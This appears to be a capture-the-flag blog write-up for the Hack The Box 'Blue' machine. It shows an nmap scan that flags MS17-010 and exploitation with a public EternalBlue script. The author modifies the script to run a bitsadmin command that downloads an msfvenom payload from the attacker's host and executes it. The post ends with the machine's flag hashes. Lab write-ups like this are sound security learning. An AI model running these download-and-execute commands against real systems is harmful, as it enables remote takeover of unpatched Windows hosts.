Welcome to my blog where I write about Threat Hunting, Pentesting and Cybersecurity in general.
HTB Blue Windows
Published on 25 Feb 2019
Easy machine, Ethernalblue exploit and metasploit is all what is needed
HTB BLue
Recon
Nmap scan
nmap/Vulns_10.10.10.40.nmap 10.10.10.40
Nmap scan report for 10.10.10.40
Host is up (0.044s latency).
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open msrpc Microsoft Windows RPC
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
Exploitation
The target machine is vulnerable to the infamous Ethernalblue exploit.
First we gonna use the metasploit module auxiliary/scanner/smb/pipe_auditor so we can use a valid PIPE name from the SMB.
We download the EthernalBlue python exploit from worawit
wget https://raw.githubusercontent.com/worawit/MS17-010/master/mysmb.py
We create our shell using msfvenom
We modified the exploit to call for our payload to be donwloaded on our target machine
#smb_send_file(smbConn, sys.argv[0], 'C', '/exploit.py')
service_exec(conn, r'cmd /c bitsadmin /transfer pwn /download http://10.10.14.14/sc.exe C:\sc.exe')
service_exec(conn, r'cmd /c /sc.exe')
# Note: there are many methods to get shell over SMB admin session
# a simple method to get shell (but easily to be detected by AV) is
# executing binary generated by "msfvenom -f exe-service ..."
We run the exploit along with a valid PIPE to use and our payload is executed
Finally we got Root level access.
Flags
ROOT "ff548eb71e920ff6c08843ce9df4e717"
USER "4c546aea7dbee75cbd71de245c8deea9"